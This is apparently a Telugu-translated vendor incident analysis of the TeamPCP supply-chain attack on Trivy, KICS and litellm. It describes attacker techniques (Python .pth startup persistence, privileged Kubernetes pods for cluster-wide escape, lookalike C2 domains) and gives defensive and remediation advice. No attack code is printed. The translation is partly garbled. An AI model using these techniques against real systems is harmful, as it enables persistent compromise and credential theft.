కొత్త TTPలు మరియు టెక్నిక్‌లు

1. భద్రతా సాధనాల సరఫరా గొలుసు విషపూరితం (T1195.002 వేరియంట్)

తదుపరి లక్ష్యాలను చేరుకోవడానికి తొలి అడుగుగా సెక్యూరిటీ స్కానర్‌లను (ట్రివీ, కెఐసిఎస్) హ్యాక్ చేయడం అనేది ఒక కొత్త స్థాయి తీవ్రతరం. దాడి చేసినవారు కేవలం ఒక లైబ్రరీని మాత్రమే హ్యాక్ చేయలేదు — వారు సంస్థలు ఉపయోగించే సాధనాలనే హ్యాక్ చేశారు. గుర్తించడం రాజీపడిన లైబ్రరీలు. ఇది ఒక అంధప్రదేశాన్ని సృష్టిస్తుంది: హానికరమైన కోడ్‌ను పట్టుకోవాల్సిన స్కానర్, దానిని అందించే యంత్రాంగంగా మారుతుంది.

2. పైథాన్ .pth ఫైల్ నిలకడ (T1546)

మా litellm_init.pth v1.82.8 లోని టెక్నిక్ ప్రత్యేకంగా మోసపూరితమైనది. పైథాన్ .pth ఫైల్లు site-packages/ ప్రతి ఇంటర్‌ప్రెటర్ ప్రారంభంలో ప్రాసెస్ చేయబడతాయి; దీనితో ప్రారంభమయ్యే ఏదైనా పంక్తి import కోడ్‌గా అమలు చేయబడుతుంది. పేలోడ్‌ను ఒకేదానికి గొలుసుగా జోడించడం ద్వారా import ఈ ప్రకటన ప్రకారం, దాడి చేసేవాడు కేవలం litellm ఇంపోర్ట్ చేసినప్పుడు మాత్రమే కాకుండా, ప్రతి పైథాన్ ప్రాసెస్‌లోనూ ఎగ్జిక్యూషన్‌ను సాధిస్తాడు. దీని అర్థం, litellm ఇన్‌స్టాల్ చేయబడి, ఎప్పుడూ ఉపయోగించకపోయినా కూడా పేలోడ్ ఫైర్ అవుతుంది, మరియు రాజీపడిన డేటాను భర్తీ చేసే రెమెడియేషన్‌ను కూడా ఇది తట్టుకుంటుంది. .py తనిఖీ చేయకుండా ఫైళ్ళు .pth ఫైళ్లు.

3. ప్రివిలేజ్డ్ పాడ్ డిప్లాయ్‌మెంట్ ద్వారా కుబెర్నెటెస్ క్లస్టర్-వైడ్ లాటరల్ మూవ్‌మెంట్ (T1610, T1611)

ప్రతి క్లస్టర్ నోడ్‌లో ప్రివిలేజ్డ్ పాడ్‌లను స్వయంచాలకంగా సృష్టించడం — దీనితో hostPIDhostNetwork, హోస్ట్ ఫైల్ సిస్టమ్ మౌంట్, మరియు chroot ఒకే రాజీపడిన వర్క్‌లోడ్‌ను పూర్తి క్లస్టర్ రాజీగా మార్చడానికి, నిలకడను ఇన్‌స్టాల్ చేయడానికి — కంటైనర్ విస్తరణను (T1610) హోస్ట్‌కు తప్పించుకోవడంతో (T1611) కలుపుతుంది.

4. విక్రేతగా నటిస్తున్న C2 మౌలిక సదుపాయాలు

ఉపయోగించి models.litellm.cloud (లిటెల్లమ్‌ను అనుకరిస్తుంది) మరియు checkmarx.zone (చెక్ మార్క్స్‌ను అనుకరిస్తూ) C2/exfil ఎండ్‌పాయింట్లు నెట్‌వర్క్ పర్యవేక్షణను తప్పించుకునేలా రూపొందించబడ్డాయి. ఎగ్రెస్‌ ట్రాఫిక్‌ను సమీక్షించే SOC విశ్లేషకులు, చట్టబద్ధమైన వెండర్ డొమైన్‌లుగా కనిపించే వాటికి HTTPS కనెక్షన్‌లను చూస్తారు.

5. వేగవంతమైన ఇన్-ఫ్లైట్ పేలోడ్ ఇటరేషన్

ఇంపోర్ట్-టైమ్ ఎగ్జిక్యూషన్‌తో v1.82.7ను, ఆ తర్వాత 13 నిమిషాలకే స్టార్టప్-టైమ్ ఎగ్జిక్యూషన్‌తో v1.82.8ను ప్రచురించడం, దాడి చేసేవాడు నిజ సమయంలో పర్యవేక్షిస్తూ, తనకి తానుగా సర్దుబాటు చేసుకుంటున్నాడని చూపిస్తుంది. సోర్స్ కోడ్‌లో భద్రపరచబడిన, కామెంట్ చేయబడిన పేలోడ్ వేరియంట్లు (విభిన్న ఎన్‌క్రిప్షన్ స్కీమ్‌లతో) ఆపరేషన్ సమయంలో చురుకైన అభివృద్ధిని నిర్ధారిస్తున్నాయి.

ఏమి చేయవచ్చు

ఈ దాడి ప్రతి స్థాయిలో నమ్మకాన్ని దుర్వినియోగం చేస్తుంది: భద్రతా సాధనాలపై నమ్మకం, ప్యాకేజీ రిజిస్ట్రీలపై నమ్మకం, సుపరిచితంగా కనిపించే డొమైన్‌లపై నమ్మకం, CI/CD ఆటోమేషన్. దాని నుండి రక్షించుకోవాలంటే ఈ విశ్వాస సరిహద్దులలో ప్రతిదానినీ పటిష్టం చేయాలి:

ప్యాకేజీ వినియోగదారుల కోసం

  • కేవలం వెర్షన్ ద్వారా కాకుండా, హ్యాష్ ద్వారా డిపెండెన్సీలను పిన్ చేయండి. pip install litellm==1.82.6 --hash=sha256:... ఒకవేళ అవి కొద్దిసేపు తాజా వెర్షన్‌గా కనిపించినప్పటికీ, రాజీపడిన వెర్షన్‌లు ఇన్‌స్టాల్ కాకుండా నిరోధించి ఉండేది.
  • లాక్‌ఫైల్‌లను ఉపయోగించండి. pip-compilepoetry.lockమరియు uv.lock ఖచ్చితమైన వెర్షన్‌లను మరియు హాష్‌లను సంగ్రహించండి. CI/CD ఫ్లోటింగ్ వెర్షన్ స్పెసిఫైయర్‌ల నుండి కాకుండా, లాక్‌ఫైల్‌ల నుండి ఇన్‌స్టాల్ చేయాలి.
  • కోసం మానిటర్ .pth ఫైళ్లు. క్రమం తప్పకుండా ఆడిట్ చేయండి site-packages/ ఊహించని కోసం .pth ఫైల్స్ — ఇవి ప్రతి పైథాన్ ప్రారంభంలోనూ అమలు అవుతాయి మరియు తక్కువగా అంచనా వేయబడిన ఒక నిల్వ యంత్రాంగం.
  • ఎగ్రెస్ నెట్‌వర్క్ నియంత్రణలను అమలు చేయండి. బయటకు తరలించడం models.litellm.cloud మరియు C2 పోలింగ్‌కు checkmarx.zone ప్రొడక్షన్ ఎన్విరాన్‌మెంట్లలో అలోలిస్ట్ ఆధారిత ఎగ్రెస్ ఫిల్టరింగ్ ద్వారా పట్టుబడి ఉండవచ్చు.

ప్యాకేజీ నిర్వహకుల కోసం

  • పిన్ CI/CD చర్యలు commit SHA, ట్యాగ్ కాదు. లైట్ఎల్ఎల్ఎమ్స్ pipeline పిన్ చేసిన వెర్షన్ లేకుండా ట్రివీని ఉపయోగించారు. ఒకవేళ అది రిఫరెన్స్ చేసి ఉంటే aquasecurity/trivy-action@<commit-sha> బదులుగా @latest, రాజీపడిన చర్య అమలు చేయబడి ఉండేది కాదు.
  • స్వల్పకాలిక, పరిమిత ప్రచురణ టోకెన్‌లను ఉపయోగించండి. PyPI విశ్వసనీయ ప్రచురణకర్తలకు (OIDC-ఆధారిత) మరియు స్కోప్డ్ API టోకెన్‌లకు మద్దతు ఇస్తుంది. బయటకు తీయబడిన PYPI_PUBLISH టోకెన్‌కు దీర్ఘకాలిక, అనియంత్రిత ప్రచురణ యాక్సెస్ ఉండకూడదు.
  • PyPIలో రెండు-కారకాల ప్రమాణీకరణను ప్రారంభించండి. నిర్వహణ సిబ్బంది అందరికీ 2FA తప్పనిసరి చేయండి మరియు సాధ్యమైన చోట హార్డ్‌వేర్ భద్రతా కీలను ఉపయోగించండి.
  • ప్యాకేజీలపై సంతకం చేయండి. Sigstore/PEP 740 ధృవీకరణలు, ఒక ప్యాకేజీని ఆశించిన తయారీదారుడే తయారు చేశాడని వినియోగదారులు ధృవీకరించుకోవడానికి వీలు కల్పిస్తాయి. CI/CD pipelineదొంగిలించబడిన టోకెన్‌తో దాడి చేసే వ్యక్తి ద్వారా కాదు.

ప్లాట్‌ఫారమ్ ఆపరేటర్ల కోసం (PyPI, npm, GitHub)

  • అసాధారణ ప్రచురణ సరళిని గుర్తించండి. సాధారణం కంటే భిన్నమైన IP లేదా టోకెన్ నుండి, 13 నిమిషాల వ్యవధిలో రెండు కొత్త వెర్షన్‌లు విడుదల చేయబడితే, ప్యాకేజీ ఇన్‌స్టాల్ చేయడానికి వీలయ్యే ముందు సమీక్ష కోసం నిలిపివేత లేదా ఆటోమేటెడ్ స్కానింగ్ జరగాలి.
  • ట్రస్టెడ్ పబ్లిషర్స్ స్వీకరణను వేగవంతం చేయండి. OIDC-ఆధారిత పబ్లిషింగ్ ప్యాకేజీలను నిర్దిష్ట రిపోజిటరీలు మరియు వర్క్‌ఫ్లోలకు అనుసంధానిస్తుంది, దీనివల్ల దొంగిలించబడిన టోకెన్‌లు అసలు వ్యవస్థ వెలుపల నిరుపయోగంగా మారతాయి. CI/CD సందర్భం.
  • ప్రచురణ సమయంలో మాల్వేర్ స్కానింగ్‌ను అమలు చేయండి. proxy_server.py లోని బేస్64-డీకోడ్ చేయబడిన పేలోడ్‌ను పబ్లిష్ సమయంలో స్టాటిక్ అనాలిసిస్ ద్వారా గుర్తించవచ్చు.

పర్యావరణ వ్యవస్థ కోసం

  • భద్రతా సాధనాలను కీలక మౌలిక సదుపాయాలుగా పరిగణించండి. ట్రివీ మరియు చెక్‌మార్క్స్ KICS లను లక్షలాది మంది ఉపయోగిస్తున్నారు. pipelineవారు స్కాన్ చేసే ప్యాకేజీల మాదిరిగానే, వారి గిట్‌హబ్ యాక్షన్‌లు కూడా అదే కఠినత్వంతో సంతకం చేయబడి, పిన్ చేయబడి, పర్యవేక్షించబడాలి.
  • రన్‌టైమ్ డిటెక్షన్‌లో పెట్టుబడి పెట్టండి. స్టాటిక్ విశ్లేషణ ఒక్కటే ప్రతి అస్పష్టపరిచే పద్ధతిని పట్టుకోలేదు. ప్యాకేజీ ఇన్‌స్టాల్ యొక్క రన్‌టైమ్ పర్యవేక్షణ hooksఅనుకోని నెట్‌వర్క్ కనెక్షన్‌లు మరియు అనుమానాస్పద ఫైల్ యాక్సెస్ పద్ధతుల నుండి లోతైన రక్షణను అందిస్తుంది.
  • ముప్పు సమాచారాన్ని మరింత వేగంగా పంచుకోండి. వివిధ విక్రేతల మధ్య సమన్వయం వేగంగా జరిగి ఉంటే, litellmకు పట్టిన 5.5 గంటల ఎక్స్‌పోజర్ వ్యవధి ఇంకా తక్కువగా ఉండేది. Xygeni MEW, Socket, మరియు Snyk వంటి ఆటోమేటెడ్ స్కానింగ్ సేవలు ఈ అసాధారణతను గుర్తించాయి — మానవ నిర్ధారణ మరియు రిజిస్ట్రీ ప్రతిస్పందన సమయమే ఇక్కడ ప్రధాన అడ్డంకి.

ముగింపు

TeamPCP ప్రచారం ఒక కీలకమైన ఘట్టం software supply chain securityమొదట సెక్యూరిటీ స్కానర్‌లను దెబ్బతీసి, వాటిని విలువైన AI మౌలిక సదుపాయాలకు సోపానాలుగా ఉపయోగించడం ద్వారా, సప్లై చైన్ అనేది దానిలోని అత్యంత బలహీనమైన పరోక్ష ఆధారపడటం వలనే బలంగా ఉంటుందని, మరియు మిమ్మల్ని సురక్షితంగా ఉంచడానికి మీరు విశ్వసించే భద్రతా సాధనం ఆ ఆధారపడటమే కావచ్చునని దాడి చేసినవారు నిరూపించారు.

LLM రాజీ అనేది AI మౌలిక సదుపాయాలకు పెరుగుతున్న ప్రమాదాన్ని ప్రత్యేకంగా హైలైట్ చేస్తుంది. LLM ప్రాక్సీ గేట్‌వేలు అవుతున్న కొద్దీ standard నమూనా కోసం enterprise AI విస్తరణలో, వారు API కీలు, క్లౌడ్ ఆధారాలు మరియు సున్నితమైన డేటాకు ప్రాప్యతను ఒకే భాగంలో కేంద్రీకరిస్తారు. ఆ భాగాన్ని దెబ్బతీయడం అనేది మొత్తం AI స్టాక్‌కు ఒక కీలకమైన తాళం వంటిది.

5.5 గంటల వ్యవధిలో litellm 1.82.7 లేదా 1.82.8ను ఇన్‌స్టాల్ చేసిన సంస్థలు దీనిని పూర్తి క్రెడెన్షియల్ రాజీగా పరిగణించాలి: ప్రభావిత సిస్టమ్‌లలోని అన్ని సీక్రెట్‌లను మార్చండి, Kubernetes క్లస్టర్‌లను ఆడిట్ చేయండి. node-setup-* పాడ్స్ లో kube-systemఏదైనా తొలగించండి sysmon.service systemd యూనిట్లు, మరియు తనిఖీ చేయండి litellm_init.pth పైథాన్‌లో site-packages/ డైరెక్టరీలు. అధికారిక డాకర్ ఇమేజ్ వినియోగదారులు (ghcr.io/berriai/litellm) ప్రభావితం కాలేదు, ఎందుకంటే చిత్రం దాని ఆధారాలను స్థిరపరిచింది మరియు ఎక్స్పోజర్ విండో సమయంలో పునర్నిర్మించబడలేదు.

రచయిత గురుంచి

సహ వ్యవస్థాపకుడు & CTO

లూయిస్ రోడ్రిగ్జ్ Xygeni Securityలో సహ-వ్యవస్థాపకుడు మరియు CTO. అప్లికేషన్ సెక్యూరిటీలో 20+ సంవత్సరాల అనుభవంతో, అతను AppSec రక్షణ మరియు అధునాతన కోడ్-విశ్లేషణ సామర్థ్యాలపై దృష్టి పెడతాడు, ఇవి బృందాలు వాస్తవ డెలివరీ ప్రమాదాన్ని తగ్గించడంలో సహాయపడతాయి.

 
sca-tools-software-composition-analysis-tools
మీ సాఫ్ట్‌వేర్ ప్రమాదాలకు ప్రాధాన్యత ఇవ్వండి, వాటిని పరిష్కరించండి మరియు సురక్షితం చేయండి.
మీ ఉచిత ఖాతాను పొందండి.
క్రెడిట్ కార్డ్ అవసరం లేదు.

మీ సాఫ్ట్‌వేర్ అభివృద్ధి మరియు డెలివరీని సురక్షితం చేసుకోండి

Xygeni ఉత్పత్తి శ్రేణితో